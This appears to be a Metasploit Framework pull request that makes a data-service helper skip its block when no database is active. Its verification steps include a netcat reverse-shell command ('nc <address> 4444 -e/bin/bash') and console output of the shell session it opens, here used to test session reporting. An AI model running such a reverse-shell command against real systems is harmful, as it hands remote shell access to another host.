### PR TITLE
Enhance session report fix 2

### DIFF
--- a/lib/metasploit/framework/data_service/proxy/core.rb
+++ b/lib/metasploit/framework/data_service/proxy/core.rb
@@ -152,8 +152,8 @@ class DataProxy
 
   # Performs a set of data service operations declared within the block.
   # This passes the @current_data_service as a parameter to the block.
-  # If there is no current data service registered, the block is not
-  # executed and the method simply returns.
+  # If there is no current data service registered or the data service
+  # is not active, the block is not executed and the method simply returns.
   def data_service_operation(&block)
     return unless block_given?
 
@@ -163,7 +163,7 @@ class DataProxy
       return
     end
 
-    block.call(data_service) unless data_service.nil?
+    block.call(data_service) if !data_service.nil? && self.active
   end
 
   def log_error(exception, ui_message)


### PR DESCRIPTION
This fixes the enhancement from #2 allowing it to work when `msfconsole` is started without a `~/.msf4/database.yml` file.

## Verification

Follow the same verification steps detailed in rapid7/metasploit-framework#10862
- [ ] Start `msfconsole` after temporarily removing the `~/.msf4/database.yml` file: `msfconsole`
- [ ] `use exploit/multi/handler`
- [ ] `set payload cmd/unix/reverse_netcat`
- [ ] `set lhost <address>`
- [ ] `set lport 4444`
- [ ] `run`
- [ ] On another system run `nc <address> 4444 -e/bin/bash`
- [ ] **Verify** a session opened message is displayed

### Example Output
```
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload cmd/unix/reverse_netcat                                                      
payload => cmd/unix/reverse_netcat
msf5 exploit(multi/handler) > set lhost 172.28.128.1
lhost => 172.28.128.1
msf5 exploit(multi/handler) > set lport 4444
lport => 4444
msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 172.28.128.1:4444
[*] Command shell session 1 opened (172.28.128.1:4444 -> 172.28.128.3:54136) at 2018-10-25 15:00:53 -0400              

^Z
Background session 1? [y/N]  y
msf5 exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               172.28.128.1:4444 -> 172.28.128.3:54136 (172.28.128.3) 
msf5 exploit(multi/handler) >
msf5 exploit(multi/handler) > db_status 
[-] No database driver installed.
```